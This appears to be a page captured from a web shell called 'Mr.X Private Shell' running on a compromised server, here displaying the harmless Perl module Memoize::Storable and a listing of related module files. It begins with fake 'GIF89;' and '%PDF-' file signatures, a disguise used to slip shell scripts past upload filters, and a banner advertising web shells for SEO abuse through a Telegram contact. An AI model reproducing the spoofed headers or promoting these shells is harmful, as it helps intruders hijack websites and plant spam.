GIF89; GIF89; %PDF- %PDF-
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
package Memoize::Storable;
=head1 NAME
Memoize::Storable - store Memoized data in Storable database
=head1 DESCRIPTION
See L<Memoize>.
=cut
use Storable ();
$VERSION = '1.03';
$Verbose = 0;
sub TIEHASH {
require Carp if $Verbose;
my $package = shift;
my $filename = shift;
my $truehash = (-e $filename) ? Storable::retrieve($filename) : {};
my %options;
print STDERR "Memoize::Storable::TIEHASH($filename, @_)\n" if $Verbose;
@options{@_} = ();
my $self =
{FILENAME => $filename,
H => $truehash,
OPTIONS => \%options
};
bless $self => $package;
}
sub STORE {
require Carp if $Verbose;
my $self = shift;
print STDERR "Memoize::Storable::STORE(@_)\n" if $Verbose;
$self->{H}{$_[0]} = $_[1];
}
sub FETCH {
require Carp if $Verbose;
my $self = shift;
print STDERR "Memoize::Storable::FETCH(@_)\n" if $Verbose;
$self->{H}{$_[0]};
}
sub EXISTS {
require Carp if $Verbose;
my $self = shift;
print STDERR "Memoize::Storable::EXISTS(@_)\n" if $Verbose;
exists $self->{H}{$_[0]};
}
sub DESTROY {
require Carp if $Verbose;
my $self= shift;
print STDERR "Memoize::Storable::DESTROY(@_)\n" if $Verbose;
if (exists $self->{OPTIONS}{'nstore'}) {
Storable::nstore($self->{H}, $self->{FILENAME});
} else {
Storable::store($self->{H}, $self->{FILENAME});
}
}
sub FIRSTKEY {
'Fake hash from Memoize::Storable';
}
sub NEXTKEY {
undef;
}
1;
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| AnyDBM_File.pm | File | 674 B | 0644 |
|
| Expire.pm | File | 11.43 KB | 0644 |
|
| ExpireFile.pm | File | 1.03 KB | 0644 |
|
| ExpireTest.pm | File | 883 B | 0644 |
|
| NDBM_File.pm | File | 1.45 KB | 0644 |
|
| SDBM_File.pm | File | 1.45 KB | 0644 |
|
| Storable.pm | File | 1.39 KB | 0644 |
|